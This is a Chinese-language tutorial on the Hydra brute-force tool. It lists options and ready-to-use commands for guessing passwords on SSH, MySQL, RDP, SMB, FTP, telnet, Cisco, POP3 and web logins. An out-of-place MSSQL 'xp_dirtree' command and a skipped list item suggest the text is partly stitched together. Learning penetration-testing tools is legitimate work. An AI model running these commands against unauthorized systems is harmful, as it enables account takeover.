目录
一、简介
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具。Hydra是一个验证性质的工具,主要目的是:展示安全研究人员从远程获取一个系统认证权限。
尽管暴力破解密码是一种低级的破解技巧,但在对那些使用默认密码和密码过于简单的的用户是一种不错的方法。
1.man hydra最万能。或者hydra -U http-form等查看具体帮助。
3.自己创建字典,然后放在当前的目录下或者指定目录。
4.参数可以统一放在最后。
5.能确定用户名,就直接用 -l 用户名。
缺点,如果目标网站登录时候需要验证码就无法破解。
二、Hydra 参数
参数:
-l login 小写,指定用户名进行破解
-L file 大写,指定用户的用户名字典
-p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。
-P file 大写,用于指定密码字典。
-e ns 额外的选项,n:空密码试探,s:使用指定账户和密码试探
-M file 指定目标ip列表文件,批量破解。
-o file 指定结果输出文件
-f 找到第一对登录名或者密码的时候中止破解。
-t tasks 同时运行的线程数,默认是16
-w time 设置最大超时时间,单位
-v / -V 显示详细过程
-R 恢复爆破(如果破解中断了,下次执行 hydra -R /path/to/hydra.restore 就可以继续任务。)
-x 自定义密码。
service:指定服务名,支持的服务跟协议有:telnet,ftp,pop3等等。
exec xp_dirtree “C:\”
三、hydra的破解命令
SSH暴力破解
hydra -L 用户名字典 -P 密码字典 -t -vV -o ssh.log -e ns IP ssh
mysql暴力破解
hydra -L 用户名字典 -P 密码字典 -t 5 IP mysql
远程桌面暴力破解
hydra -L 用户名字典 -P 密码字典 -t 1 IP rdp
使用hydra破解ssh的密码
hydra -L 用户名字典 -P 密码字典 -o ssh.log -e ns IP ssh
破解https:
hydra -m /index.php -l 用户名 -P 密码字典 IP https
破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco:
hydra -P 用户字典 IP cisco
hydra -m cloud -P 密码字典 IP cisco-enable
破解smb:
hydra -l administrator -P 密码字典 IP smb
破解pop3:
hydra -l (muts)用户名 -P 密码字典 my.pop3.mail pop3
破解rdp:
hydra IP rdp -l administrator -P 密码字典 -V
破解http-proxy:
hydra -l admin -P 密码字典 http-proxy://127.0.0.1
破解telnet
hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
破解ftp:
hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV
hydra IP ftp -l 用户名 -P 密码字典 -e ns -vV
get方式提交,破解web登录:
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get (/admin/)
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get (/admin/index.php)
Post
<form action="index.php" method="POST">
<input type="text" name="name" /><BR><br>
<input type="password" name="pwd" /><br><br>
<input type="submit" name="sub" value="提交">
</form>